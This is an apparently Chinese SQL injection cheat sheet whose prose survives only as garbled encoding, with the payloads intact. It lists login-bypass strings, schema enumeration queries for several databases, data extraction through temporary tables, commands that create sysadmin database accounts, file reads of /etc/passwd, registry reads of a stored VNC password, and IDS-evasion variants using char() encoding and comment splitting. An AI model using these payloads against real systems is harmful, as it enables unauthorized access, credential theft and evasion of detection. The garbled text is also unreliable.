SQLע似
SQLע似תԣhttp://nb.2sb.cn/?p=54
ߣɫ
====||Ŀ¼||=====
C
1
2©
3ռϢ
4
5ץȡ
6ݿʺ
7MYSQL
8
9עVNC
10̴IDS֤
11MYSQLʹchar()ƭ
12עͶIDS֤
13ŵַ
====||¿ʼ||====
1
㿴һֻ80˿ڣһ̶˵ԱϵͳIJĺܺãҪЧĹҲӦתWEBSQLעõĹʽ㹥WENϵͳASPPHPJSPCGIȣȥϵͳϵͳҪĶࡣ
SQLעͨҳеƭʹǹIJѯ֪߱WEBкܶĵطûE_mail
2©
ʼӦôԣ
- Login: or 1=1C
- Pass: or 1=1C
- http://website/index.asp?id= or 1=1C
ķʽ
- having 1=1C
- group by userid having 1=1C
- SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename)C
- union select sum(columnname) from tablenameC
3ռϢ
- or 1 in (select @@version)C
- union all select @@versionC
ͿԵõϵͳİ汾ͲϢ
4
Oracleݿ>>
C>SYS.USER_OBJECTS (USEROBJECTS)
C>SYS.USER_VIEWS
C>SYS.USER_TABLES
C>SYS.USER_VIEWS
C>SYS.USER_TAB_COLUMNS
C>SYS.USER_CATALOG
C>SYS.USER_TRIGGERS
C>SYS.ALL_TABLES
C>SYS.TAB
MySQLݿ
C>mysql.user
C>mysql.host
C>mysql.db
MS access
C>MsysACEs
C>MsysObjects
C>MsysQueries
C>MsysRelationships
MS SQL Serverݿ
C>sysobjects
C>syscolumns
C>systypes
C>sysdatabases
5ץȡ
䡣
//ѯĽ
step1 : ; begin declare @var varchar(8000) set @var=: select @var=@var++login+/'+password+ from users where login > @var select @var as var into temp end C
//ȡϢ
step2 : and 1 in (select var from temp)C
//ɾʱ
step3 : ; drop table temp C
6ݿʺ
MS SQL
exec sp_addlogin name , password
exec sp_addsrvrolemember name , sysadmin
MySQL
INSERT INTO mysql.user (user, host, password) VALUES (name, localhost, PASSWORD(pass123))
Access
CRATE USER name IDENTIFIED BY pass123
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD pass123
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7MYSQLѯ
ʹUnionѯļ룬£
- union select 1,load_file(/etc/passwd),1,1,1;
8ϵͳ
- and 1 in (select @@servername)C
- and 1 in (select servername from master.sysservers)C
9ҵVNC루ע
ʵ£
- ; declare @out binary(8)
- exec master..xp_regread
- @rootkey = HKEY_LOCAL_MACHINE,
- @key = SOFTWARE\ORL\WinVNC3\Default,
- @value_name=password,
- @value = @out output
- select cast (@out as bigint) as x into TEMPC
- and 1 in (select cast(x as varchar) from temp)C
10ܿIDS
Evading OR 1=1 Signature
- OR unusual = unusual
- OR something = some+'thing
- OR text = Ntext
- OR something like some%
- OR 2 > 1
- OR text > t
- OR whatever in (whatever)
- OR 2 BETWEEN 1 and 3
11MYSQLʹchar()
ŵע䣬磺 (string = %):
C> or username like char(37);
ŵע䣬磺 (string=root):
C> union select * from users where login = char(114,111,111,116);
unionsʹload files 磺(string = /etc/passwd):
C> union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
ļǷڣ磺 (string = n.ext):
C> and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
12עͷűܿIDS
£
C>/**/OR/**/1/**/=/**/1
C>Username: or 1/*
C>Password:*/=1C
C>UNI/**/ON SEL/**/ECT ȽϺӦôΪ
C>(Oracle) ; EXECUTE IMMEDIATE SEL || ECT US || ER
C>(MS SQL) ; EXEC (SEL + ECT US + ER)
13ŵַ
char()0X첻ŵ䡣
C> INSERT INTO Users(Login, Password, Level) VALUES( char(070) + char(065) + char(074) + char(065) + char(072) + char(070) + char(065) + char(074) + char(065) + char(072), 064)
ҳ:
[1]